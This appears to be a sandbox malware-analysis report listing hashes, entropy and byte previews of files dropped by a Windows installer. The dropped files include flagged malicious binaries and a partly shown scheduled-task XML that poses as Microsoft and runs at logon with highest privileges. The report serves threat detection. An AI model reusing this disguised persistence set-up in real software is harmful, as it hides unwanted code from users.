Preview:	7z..'......M........2............."...zI.r?.......pJ..8._...W.v-.9..8r{..J$M....h.`W.I.....6.....~m....8..WI5....c.jE.J4.6O+.+.[.B[\|..?B?.&fu...'3.5..]CO .3....<T.+)..pN..6@..u`+.... H..D"....}..J.y...D0..m.j...z...%.a.a....\|_.l..........9.wN.Mv....&:.iD.8[.bf.j.....j.(-1K....K~....O\|...N...u..~..7s....C..d.js].=..U.S".Y...rD\7:j.].[....&,..u.LX`.s3.lJ..!.NR.Jv.G.:.....`@.Z.Z...`.......2...%qW..D.@....f.1.S.6......U..F2...n.c&...`qk....d.J....M....%...s.........XyW..)hq.....<..\0.]=..O.v2......}......a..~Zr1...V.C....~6.......+.b..;.q...bWy.R...........j.x.0.RY...f@.j.....S....Y...;$S.<.......1..3..(1L..@.6#.R..zu......oT..L.d...E..:`.O..b..d1...[N.).i`.c........+......T.s.Q..]......`.G23..d....V.Whk.J..@(..Gjl2v ..SZPg.0...Ts....i......Y.w>.j\|:...t.L..o..i.^N.GEo.K...-`.V.K...Jjrpp.....f....a...1O...G..\|{...;s..W....p....(.f......(...4ts(....[o..c....$-.@..*.MOB...[..e..s.`,....~..\...z...>...e..v]#...j.)9.1,q.'.A.K.I.E.....>...

C:\Program Files (x86)\Windows NT\locale2.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	56546
Entropy (8bit):	7.996966859255975
Encrypted:	true
SSDEEP:	1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
MD5:	CEA69F993E1CE0FB945A98BF37A66546
SHA1:	7114365265F041DA904574D1F5876544506F89BA
SHA-256:	E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
SHA-512:	4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
Malicious:	false
Preview:	.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.\|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~.....'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z\|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p..bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm....E....2........s. R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

C:\Program Files (x86)\Windows NT\locale2.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	56546
Entropy (8bit):	7.996966859255979
Encrypted:	true
SSDEEP:	1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
MD5:	4CB8B7E557C80FC7B014133AB834A042
SHA1:	C42E2C861FF3ED0E6A11824E12F67A344E8F783D
SHA-256:	3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
SHA-512:	A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
Malicious:	false
Preview:	7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..\|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.\|. a.:..5.....b.....2......W.....Z.pS.b/.F.;\|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f........@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..\| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..\|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

C:\Program Files (x86)\Windows NT\locale3.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	31890
Entropy (8bit):	7.99402458740637
Encrypted:	true
SSDEEP:	768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
MD5:	8622FC7228777F64A47BD6C61478ADD9
SHA1:	9A7C15F341835F83C96DA804DC1E21FDA696BB56
SHA-256:	4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
SHA-512:	71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
Malicious:	false
Preview:	.@S......................xi.\ .~.#..:}..fy?koGL^\|kH.G...........x....Tg.Y.t....~^..".L.41.....R..\|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.\|a.]..@DP".`Rz}...\|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........\|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C.......V..\|..2.J..i.r....\|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ...8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

C:\Program Files (x86)\Windows NT\locale3.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	31890
Entropy (8bit):	7.99402458740637
Encrypted:	true
SSDEEP:	768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
MD5:	CE6034AFC63BB42F4E0D6CD897DFBCB8
SHA1:	49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
SHA-256:	7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
SHA-512:	7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
Malicious:	false
Preview:	7z..'....oYU@\|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc.o@\|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB\|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

C:\Program Files (x86)\Windows NT\locale4.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	74960
Entropy (8bit):	7.99759370165655
Encrypted:	true
SSDEEP:	1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
MD5:	950338D50B95A25F494EE74E97B7B7A9
SHA1:	F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
SHA-256:	87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
SHA-512:	9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
Malicious:	false
Preview:	.@S........................F.T....r...z'I.N..].u.e.e..y.....<\|r.:v.....J.i...L.Sv.....Nz..,..K.sI./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X\|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.......9;..R...VL.]..%j.....TM.4.....P.L...

C:\Program Files (x86)\Windows NT\locale4.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	74960
Entropy (8bit):	7.997593701656546
Encrypted:	true
SSDEEP:	1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
MD5:	059BA7C31F3E227356CA5F29E4AA2508
SHA1:	FA3DC96A3336903ED5E6105A197A02E618E3F634
SHA-256:	1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
SHA-512:	E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
Malicious:	false
Preview:	7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7....!!.(.....Gc..........Dg....Z..#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.\|T.5..V...E\|...q.........].}bl...y.....;...q....-a..RP3..L~k....\|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

C:\Program Files (x86)\Windows NT\locale7.bin

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	data
Category:	dropped
Size (bytes):	29730
Entropy (8bit):	7.994290657653607
Encrypted:	true
SSDEEP:	768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
MD5:	2C3E0D1FB580A8F0855355CC7D8D4F7A
SHA1:	177E4A0B7C4BC8ACE0F46127398808E669222515
SHA-256:	9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
SHA-512:	B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
Malicious:	false
Preview:	.@S....z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#\|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.\|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

C:\Program Files (x86)\Windows NT\locale7.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	29730
Entropy (8bit):	7.994290657653608
Encrypted:	true
SSDEEP:	768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
MD5:	A9C8A3E00692F79E1BA9693003F85D18
SHA1:	5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
SHA-256:	B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
SHA-512:	8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
Malicious:	false
Preview:	7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?......XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...\|Ynic......ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..\|..)f...C....$...E....H"x..F....wW...3"......Y.Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$.....&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

C:\Program Files (x86)\Windows NT\res.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	7-zip archive data, version 0.4
Category:	dropped
Size (bytes):	249968
Entropy (8bit):	7.9992787830174565
Encrypted:	true
SSDEEP:	6144:w9hF7VQIqW8AiYr5wInydSC8FpX3HSmdc4YRQltRMHh3XL:w3sYr5wInydSvFpX3yp4YmbWHL
MD5:	23244D091AC9F35046F2EFD16EAD0DFA
SHA1:	42183A43273BA3F42186FF0862664FE83EED4783
SHA-256:	E184AF0EE1919F9C2593B2FC00D7ECC2A32288B0A49D971FDA5AC6007C4CDDE0
SHA-512:	76A988EB016B86B3F92F82FCD688DE988D14C5502C04F35E94460ED5168787DECAC9839D86BAB85902CCA7DCB9015875C63613BB1FF007BEA3355E8CF3E2FCEE
Malicious:	false
Preview:	7z..'....Z.........@...........iG>..(.P.....@..!P.c......)E....;C\........gU..e.w1....J.....lce..).....Q...lVs..........+(..Z.P.v.r...F.q@.j...e1.d.........lL..V..{!]D.;.H.^"..0.......N...+Uo..aw./......K..\|C..h..5.y...!.B;.>a+.@z...l$.H..dB.s...S.a..n...F.w...q.c.^j."...L.t.?..$Dz+..~rS......@.......ny.._L........^B'.J...P.EZN;h]0..M.$.x.RU.....'`.9/FU..W.,.@&...B.....Y@yX...Z..00.R.......P.&O.P!........2.r....G.LM.k...x.....C"N.w~Fj.....x.P.2)].....d.RP..D<.....h.L..,.....R..Z.q~-:b...$C....X..."u....".jq...0.......{.}v....+K.3M.?<Z~.a..........NM[...O.e.....u.P..D.=heQ.....k.......c.\$......C\.c5L.<.r.H.....iw.0...fWnu."...}....y.....W.q.M%.X..v..ew6...gW..j..\|.]C..y..d#.?..PF.x...h \|.`].g..[.....V..K.........Y..3e..l..,a.%.h1.Dx.q.......t.!h..z[..<f..P..N...H.....V(....J..Cv..I......3.......!N..I.V-.Y2J...rt..b&}..b.<.Xcu..[....z. .k.U7.,...3.w.o\.([JL..U.T.jo...e.h.:M..a.WX.x..Uu2s ......B8..1.F..FD,...H..o..}.3.V. .r.

C:\Program Files (x86)\Windows NT\tProtect.dll

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	63640
Entropy (8bit):	6.482810107683822
Encrypted:	false
SSDEEP:	768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
MD5:	B4EAACCE30F51EAF2A36CEA680B45A66
SHA1:	94493D7739C5EE7346DA31D9523404D62682B195
SHA-256:	15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
SHA-512:	16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.\|XN4.5N.\|HN6.5NA'XN6.5N.\|DN0.5N.\|IN6.5N.\|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

C:\Program Files (x86)\Windows NT\task.xml

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.3449406240731085
Encrypted:	false
SSDEEP:	48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
MD5:	1EA10B1FA76DC2F1967E53A3FC2D43C4
SHA1:	23EADA9D0994D5B9ADE7878493C44551C0B5CF44
SHA-256:	2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
SHA-512:	15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
Malicious:	false
Preview:	<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv

C:\Program Files (x86)\Windows NT\trash (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5649408
Entropy (8bit):	6.392614480390128
Encrypted:	false
SSDEEP:	98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
MD5:	8C71B86BF407C05BAF11E8D296B9C8B8
SHA1:	6624AB8CA883C48F02C58250D4EEE9E90098F4E4
SHA-256:	BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
SHA-512:	BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..\|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulVmdtZ:NllUM
MD5:	013016A37665E1E37F0A3576A8EC8324
SHA1:	260F55EC88E3C4D384658F3C18C7FDEF202E47DD
SHA-256:	20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
SHA-512:	99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3trkrlnv.vwo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gnolrdq.yk0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqv2isbv.5we.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j32rbbna.tb4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Download File

Process:	C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3366912
Entropy (8bit):	6.530548291878271
Encrypted:	false
SSDEEP:	98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:	9902FA6D39184B87AED7D94A037912D8
SHA1:	F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
SHA-256:	43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
